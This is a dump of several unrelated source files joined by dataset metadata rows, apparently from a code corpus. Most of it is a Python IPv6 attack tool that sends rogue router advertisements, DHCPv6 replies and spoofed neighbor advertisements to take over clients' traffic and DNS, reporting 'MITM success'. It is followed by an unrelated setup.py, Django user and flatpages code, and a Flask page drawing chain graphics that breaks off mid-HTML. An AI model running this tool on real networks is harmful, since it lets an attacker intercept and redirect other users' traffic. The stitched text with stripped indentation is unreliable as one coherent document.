Base.print_info("DNS IPv6 address: ", recursive_dns_address)
Base.print_info("Domain search: ", dns_search)
# endregion
# region Add client info in global clients dictionary
def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False):
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
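# Example (illustrative, not part of the original script) of how the global
# clients dictionary evolves; the MAC and IPv6 values are hypothetical:
#
#   add_client_info_in_dictionary('00:11:22:33:44:55',
#                                 {'dhcpv6 solicit': True, 'advertise address': 'fd00::2'})
#   add_client_info_in_dictionary('00:11:22:33:44:55', {'dhcpv6 mitm': 'success'}, True)
#   # clients['00:11:22:33:44:55'] now holds all three keys merged together.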
# region Send ICMPv6 solicit packets
def send_icmpv6_solicit_packets():
icmpv6_solicit_raw_socket = socket(AF_PACKET, SOCK_RAW)
icmpv6_solicit_raw_socket.bind((current_network_interface, 0))
try:
while True:
icmpv6_solicit_packet = icmpv6.make_router_solicit_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
need_source_link_layer_address=True,
source_link_layer_address=eth.get_random_mac())
icmpv6_solicit_raw_socket.send(icmpv6_solicit_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
icmpv6_solicit_raw_socket.close()
exit(0)
# endregion
# region Send DHCPv6 solicit packets
def send_dhcpv6_solicit_packets():
dhcpv6_solicit_raw_socket = socket(AF_PACKET, SOCK_RAW)
dhcpv6_solicit_raw_socket.bind((current_network_interface, 0))
try:
while True:
Client_DUID = dhcpv6.get_duid(eth.get_random_mac())
request_options = [23, 24]
dhcpv6_solicit_packet = dhcpv6.make_solicit_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
transaction_id=randint(1, 16777215),
client_identifier=Client_DUID,
option_request_list=request_options)
dhcpv6_solicit_raw_socket.send(dhcpv6_solicit_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
dhcpv6_solicit_raw_socket.close()
exit(0)
# endregion
# region Send ICMPv6 advertise packets
def send_icmpv6_advertise_packets():
icmpv6_advertise_raw_socket = socket(AF_PACKET, SOCK_RAW)
icmpv6_advertise_raw_socket.bind((current_network_interface, 0))
icmpv6_ra_packet = icmpv6.make_router_advertisement_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac="33:33:00:00:00:01",
ipv6_src=your_local_ipv6_address,
ipv6_dst="ff02::1",
dns_address=recursive_dns_address,
domain_search=dns_search,
prefix=network_prefix,
router_lifetime=5000,
advertisement_interval=int(args.delay) * 1000)
try:
while True:
icmpv6_advertise_raw_socket.send(icmpv6_ra_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
icmpv6_advertise_raw_socket.close()
exit(0)
# endregion
# region Reply to DHCPv6 and ICMPv6 requests
def reply(request):
# region Define global variables
global global_socket
global disable_dhcpv6
global clients
global target_ipv6_address
global first_suffix
global last_suffix
# endregion
# region Get client MAC address
client_mac_address = request['Ethernet']['source']
# endregion
# region Check this client already in global clients dictionary
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region ICMPv6
if 'ICMPv6' in request.keys():
# region ICMPv6 Router Solicitation
if request['ICMPv6']['type'] == 133:
# Make and send ICMPv6 router advertisement packet
icmpv6_ra_packet = icmpv6.make_router_advertisement_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
dns_address=recursive_dns_address,
domain_search=dns_search,
prefix=network_prefix,
router_lifetime=5000)
global_socket.send(icmpv6_ra_packet)
# Print info messages
Base.print_info("ICMPv6 Router Solicitation request from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")")
Base.print_info("ICMPv6 Router Advertisement reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")")
# Delete this client from global clients dictionary
try:
del clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"router solicitation": True,
"network prefix": network_prefix},
client_already_in_dictionary)
# endregion
# region ICMPv6 Neighbor Solicitation
if request['ICMPv6']['type'] == 135:
# region Get ICMPv6 Neighbor Solicitation target address
target_address = request['ICMPv6']['target-address']
# endregion
# region Network prefix in ICMPv6 Neighbor Solicitation target address is bad
if not target_address.startswith('fe80::'):
if not target_address.startswith(network_prefix_address):
na_packet = icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
target_ipv6_address=target_address)
for _ in range(5):
global_socket.send(na_packet)
# endregion
# region ICMPv6 Neighbor Solicitation target address is your local IPv6 address
if target_address == your_local_ipv6_address:
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"neighbor solicitation your address": True},
client_already_in_dictionary)
# endregion
# region DHCPv6 advertise address is set
# This client already in dictionary
if client_already_in_dictionary:
# Advertise address for this client is set
if 'advertise address' in clients[client_mac_address].keys():
# ICMPv6 Neighbor Solicitation target address is DHCPv6 advertise IPv6 address
if target_address == clients[client_mac_address]['advertise address']:
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"neighbor solicitation advertise address": True},
client_already_in_dictionary)
# ICMPv6 Neighbor Solicitation target address is not DHCPv6 advertise IPv6 address
else:
if not target_address.startswith('fe80::'):
na_packet = icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
target_ipv6_address=target_address)
for _ in range(5):
global_socket.send(na_packet)
# endregion
# region Print MITM Success message
if not disable_dhcpv6:
try:
if clients[client_mac_address]['dhcpv6 mitm'] == 'success':
test = clients[client_mac_address]['neighbor solicitation your address']
try:
test = clients[client_mac_address]['success message']
except KeyError:
Base.print_success("MITM success: ",
clients[client_mac_address]['advertise address'] +
" (" + client_mac_address + ")")
clients[client_mac_address].update({"success message": True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region DHCPv6
# Protocol DHCPv6 is enabled
if not disable_dhcpv6:
if 'DHCPv6' in request.keys():
# region DHCPv6 Solicit
if request['DHCPv6']['message-type'] == 1:
# Get Client DUID time from Client Identifier DUID
client_duid_time = 0
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
# Set IPv6 address in advertise packet
if target_ipv6_address is not None:
ipv6_address = target_ipv6_address
else:
ipv6_address = network_prefix.split('/')[0] + str(randint(first_suffix, last_suffix))
# Make and send DHCPv6 advertise packet
dhcpv6_advertise = dhcpv6.make_advertise_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_advertise)
# Print info messages
Base.print_info("DHCPv6 Solicit from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']))
Base.print_info("DHCPv6 Advertise to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", ipv6_address)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 solicit": True,
"advertise address": ipv6_address},
client_already_in_dictionary)
# endregion
# region DHCPv6 Request
if request['DHCPv6']['message-type'] == 3:
# Set DHCPv6 reply packet
dhcpv6_reply = None
# region Get Client DUID time, IPv6 address and Server MAC address
client_duid_time = 0
client_ipv6_address = None
server_mac_address = None
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
if dhcpv6_option['type'] == 2:
server_mac_address = dhcpv6_option['value']['mac-address']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
if server_mac_address and client_ipv6_address is not None:
# Check Server MAC address
if server_mac_address != your_mac_address:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: server mac address is not your mac address"},
client_already_in_dictionary)
else:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm": "success"},
client_already_in_dictionary)
try:
if client_ipv6_address == clients[client_mac_address]['advertise address']:
dhcpv6_reply = dhcpv6.make_reply_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']
['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=client_ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_reply)
else:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: client request address is not advertise address"},
client_already_in_dictionary)
except KeyError:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: not found dhcpv6 solicit request for this client"},
client_already_in_dictionary)
# Print info messages
Base.print_info("DHCPv6 Request from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" Server: ", server_mac_address,
" IAA: ", client_ipv6_address)
if dhcpv6_reply is not None:
Base.print_info("DHCPv6 Reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" Server: ", server_mac_address,
" IAA: ", client_ipv6_address)
else:
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: server mac address is not your mac address":
Base.print_error("Server MAC address in DHCPv6 Request is not your MAC address " +
"for this client: ", client_mac_address)
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: client request address is not advertise address":
Base.print_error("Client requested IPv6 address is not advertise IPv6 address " +
"for this client: ", client_mac_address)
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: not found dhcpv6 solicit request for this client":
Base.print_error("Could not found DHCPv6 solicit request " +
"for this client: ", client_mac_address)
# endregion
# region DHCPv6 Release
if request['DHCPv6']['message-type'] == 8:
# Print info message
Base.print_info("DHCPv6 Release from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']))
# Delete this client from global clients dictionary
try:
del clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# endregion
# region DHCPv6 Confirm
if request['DHCPv6']['message-type'] == 4:
# region Get Client DUID time and client IPv6 address
client_duid_time = 0
client_ipv6_address = None
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
# region Make and send DHCPv6 Reply packet
dhcpv6_reply = dhcpv6.make_reply_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=client_ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_reply)
# endregion
# region Add Client info in global clients dictionary and print info message
add_client_info_in_dictionary(client_mac_address,
{"advertise address": client_ipv6_address,
"dhcpv6 mitm": "success"},
client_already_in_dictionary)
Base.print_info("DHCPv6 Confirm from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", client_ipv6_address)
Base.print_info("DHCPv6 Reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", client_ipv6_address)
# endregion
# endregion
# # DHCPv6 Decline
# if request.haslayer(DHCP6_Decline):
# print Base.c_warning + "Sniff DHCPv6 Decline from: " + request[IPv6].src + " (" + \
# request[Ether].src + ") TID: " + hex(request[DHCP6_Decline].trid) + \
# " IAADDR: " + request[DHCP6OptIAAddress].addr
# # print request.summary
# endregion
# endregion
# region Main function
if __name__ == "__main__":
# region Send ICMPv6 advertise packets in other thread
tm.add_task(send_icmpv6_advertise_packets)
# endregion
# region Add multicast MAC addresses on interface
try:
Base.print_info("Get milticast MAC address on interface: ", current_network_interface)
mcast_addresses = sub.Popen(['ip maddress show ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = mcast_addresses.communicate()
if icmpv6_router_solicitation_address not in out:
icmpv6_mcast_address = sub.Popen(['ip maddress add ' + icmpv6_router_solicitation_address +
' dev ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = icmpv6_mcast_address.communicate()
if out == "":
Base.print_info("Add milticast MAC address: ", icmpv6_router_solicitation_address,
" on interface: ", current_network_interface)
else:
Base.print_error("Could not add milticast MAC address: ", icmpv6_router_solicitation_address,
" on interface: ", current_network_interface)
exit(1)
if dhcpv6_requests_address not in out:
dhcp6_mcast_address = sub.Popen(['ip maddress add ' + dhcpv6_requests_address +
' dev ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = dhcp6_mcast_address.communicate()
if out == "":
Base.print_info("Add milticast MAC address: ", dhcpv6_requests_address,
" on interface: ", current_network_interface)
else:
Base.print_error("Could not add milticast MAC address: ", dhcpv6_requests_address,
" on interface: ", current_network_interface)
exit(1)
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "ip", " is not installed!")
exit(1)
else:
Base.print_error("Something went wrong while trying to run ", "`ip`")
exit(2)
# endregion
# region Create RAW socket for sniffing
raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
Base.print_info("Waiting for a ICMPv6 or DHCPv6 requests ...")
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
# endregion
# region IPv6 packet
# 34525 - Type of IP packet (0x86dd)
if ethernet_header_dict['type'] != ipv6.header_type:
break
# region Parse IPv6 header
ipv6_header = packet[eth.header_length:eth.header_length + ipv6.header_length]
ipv6_header_dict = ipv6.parse_header(ipv6_header)
# endregion
# region Could not parse IPv6 header - break
if ipv6_header_dict is None:
break
# endregion
# region UDP
if ipv6_header_dict['next-header'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + ipv6.header_length
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header_dict is None:
break
# endregion
# region DHCPv6 packet
if udp_header_dict['destination-port'] == 547 and udp_header_dict['source-port'] == 546:
# region Parse DHCPv6 request packet
dhcpv6_packet_offset = udp_header_offset + udp.header_length
dhcpv6_packet = packet[dhcpv6_packet_offset:]
dhcpv6_packet_dict = dhcpv6.parse_packet(dhcpv6_packet)
# endregion
# region Could not parse DHCPv6 request packet - break
if dhcpv6_packet_dict is None:
break
# endregion
# region Call function with full DHCPv6 packet
reply({
"Ethernet": ethernet_header_dict,
"IPv6": ipv6_header_dict,
"UDP": udp_header_dict,
"DHCPv6": dhcpv6_packet_dict
})
# endregion
# endregion
# endregion
# region ICMPv6
if ipv6_header_dict['next-header'] == icmpv6.packet_type:
# region Parse ICMPv6 packet
icmpv6_packet_offset = eth.header_length + ipv6.header_length
icmpv6_packet = packet[icmpv6_packet_offset:]
icmpv6_packet_dict = icmpv6.parse_packet(icmpv6_packet)
# endregion
# region Could not parse ICMPv6 packet - break
if icmpv6_packet_dict is None:
break
# endregion
# region ICMPv6 filter
                    if icmpv6_packet_dict['type'] in (133, 135):
pass
else:
break
# endregion
# region Call function with full ICMPv6 packet
reply({
"Ethernet": ethernet_header_dict,
"IPv6": ipv6_header_dict,
"ICMPv6": icmpv6_packet_dict
})
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
# endregion
# endregion
# endregion
|
unlicense
| 7,659,077,770,600,407,000 | 43.846914 | 121 | 0.500248 | false | 4.588354 | false | false | false |
JoshData/diff_match_patch-python
|
setup.py
|
2
|
1307
|
from setuptools import setup, find_packages, Extension
# Note to self: To upload a new version to PyPI, run:
# pip install wheel twine
# python setup.py sdist bdist_wheel
# twine upload dist/*
module1 = Extension('diff_match_patch',
sources = ['interface.cpp'],
include_dirs = [],
libraries = [])
setup(
name='diff_match_patch_python',
version='1.0.2',
description=u'A Python extension module that wraps Google\'s diff_match_patch C++ implementation for very fast string comparisons. Version 1.0.2 fixes a build issue on Macs.',
long_description=open("README.rst").read(),
author=u'Joshua Tauberer',
author_email=u'[email protected]',
url='https://github.com/JoshData/diff_match_patch-python',
packages=find_packages(),
license='CC0 (copyright waived)',
keywords="diff compare Google match patch diff_match_patch extension native C fast",
ext_modules=[module1],
classifiers=[
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
test_suite='tests',
)
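# Building locally (illustrative, not part of the original file): the C++
# extension can be compiled in place or installed with pip from the checkout.
#
#   python setup.py build_ext --inplace
#   pip install .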
|
cc0-1.0
| -4,188,308,818,056,781,300 | 37.441176 | 179 | 0.636572 | false | 3.972644 | false | false | false |
SeaItRise/SeaItRise-webportal
|
src/accounts/models.py
|
1
|
4568
|
import uuid
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
class MyUserManager(BaseUserManager):
def _create_user(self, email, password, first_name, last_name, is_staff, is_superuser, **extra_fields):
"""
Create and save an User with the given email, password, name and phone number.
:param email: string
:param password: string
:param first_name: string
:param last_name: string
:param is_staff: boolean
:param is_superuser: boolean
:param extra_fields:
:return: User
"""
now = timezone.now()
email = self.normalize_email(email)
user = self.model(email=email,
first_name=first_name,
last_name=last_name,
is_staff=is_staff,
is_active=True,
is_superuser=is_superuser,
last_login=now,
date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, email, first_name, last_name, password, **extra_fields):
"""
Create and save an User with the given email, password and name.
:param email: string
:param first_name: string
:param last_name: string
:param password: string
:param extra_fields:
:return: User
"""
return self._create_user(email, password, first_name, last_name, is_staff=False, is_superuser=False,
**extra_fields)
def create_superuser(self, email, first_name='', last_name='', password=None, **extra_fields):
"""
Create a super user.
:param email: string
:param first_name: string
:param last_name: string
:param password: string
:param extra_fields:
:return: User
"""
return self._create_user(email, password, first_name, last_name, is_staff=True, is_superuser=True,
**extra_fields)
class User(AbstractBaseUser):
"""
Model that represents an user.
To be active, the user must register and confirm his email.
"""
GENDER_MALE = 'M'
GENDER_FEMALE = 'F'
GENDER_CHOICES = (
(GENDER_MALE, 'Male'),
(GENDER_FEMALE, 'Female')
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
first_name = models.CharField(_('First Name'), max_length=50)
last_name = models.CharField(_('Last Name'), max_length=50)
email = models.EmailField(_('Email address'), unique=True)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, default=GENDER_MALE)
confirmed_email = models.BooleanField(default=False)
is_staff = models.BooleanField(_('staff status'), default=False)
is_superuser = models.BooleanField(_('superuser status'), default=False)
is_active = models.BooleanField(_('active'), default=True)
date_joined = models.DateTimeField(_('date joined'), auto_now_add=True)
date_updated = models.DateTimeField(_('date updated'), auto_now=True)
activation_key = models.UUIDField(unique=True, default=uuid.uuid4) # email
USERNAME_FIELD = 'email'
objects = MyUserManager()
def __str__(self):
"""
Unicode representation for an user model.
:return: string
"""
return self.email
def get_full_name(self):
"""
Return the first_name plus the last_name, with a space in between.
:return: string
"""
return "{0} {1}".format(self.first_name, self.last_name)
def get_short_name(self):
"""
Return the first_name.
:return: string
"""
return self.first_name
def activation_expired(self):
"""
Check if user's activation has expired.
:return: boolean
"""
return self.date_joined + timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS) < timezone.now()
def confirm_email(self):
"""
Confirm email.
:return: boolean
"""
if not self.activation_expired() and not self.confirmed_email:
self.confirmed_email = True
self.save()
return True
return False
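# Example usage (illustrative, not part of the original module); the values are
# hypothetical and assume a configured Django project:
#
#   user = User.objects.create_user(
#       email='jane@example.com',
#       first_name='Jane',
#       last_name='Doe',
#       password='s3cret',
#   )
#   user.confirm_email()    # True while the activation window is still open
#   user.get_full_name()    # 'Jane Doe'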
|
mit
| -9,196,402,323,068,319,000 | 29.657718 | 108 | 0.59282 | false | 4.175503 | false | false | false |
greggian/TapdIn
|
django/contrib/flatpages/admin.py
|
1
|
1100
|
from django import forms
from django.contrib import admin
from django.contrib.flatpages.models import FlatPage
from django.utils.translation import ugettext_lazy as _
class FlatpageForm(forms.ModelForm):
url = forms.RegexField(label=_("URL"), max_length=100, regex=r'^[-\w/]+$',
help_text = _("Example: '/about/contact/'. Make sure to have leading"
" and trailing slashes."),
error_message = _("This value must contain only letters, numbers,"
" underscores, dashes or slashes."))
class Meta:
model = FlatPage
class FlatPageAdmin(admin.ModelAdmin):
form = FlatpageForm
fieldsets = (
(None, {'fields': ('url', 'title', 'content', 'sites')}),
(_('Advanced options'), {'classes': ('collapse',), 'fields': ('enable_comments', 'registration_required', 'template_name')}),
)
list_display = ('url', 'title')
list_filter = ('sites', 'enable_comments', 'registration_required')
search_fields = ('url', 'title')
admin.site.register(FlatPage, FlatPageAdmin)
|
apache-2.0
| 7,297,535,413,985,754,000 | 37.285714 | 133 | 0.615455 | false | 4.11985 | false | false | false |
2015fallhw/cdw11
|
users/b/g11/bg11_40323247.py
|
1
|
20505
|
# Each group builds its application in its own .py module (step 1 of 3)
from flask import Blueprint, render_template, make_response
# Use Blueprint to create ag1, with url prefix /ag1, and set the template folder
bg11_40323247 = Blueprint('bg11_40323247', __name__, url_prefix='/bg11_40323247', template_folder='templates')
@bg11_40323247.route('/task47_1')
def task47_1():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-250, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-315, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="blue")
cgo.setWorldCoords(-385, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="red")
cgo.setWorldCoords(-445, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
</script>
</body></html>
'''
return outstring
@bg11_40323247.route('/task47_2')
def task47_2():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
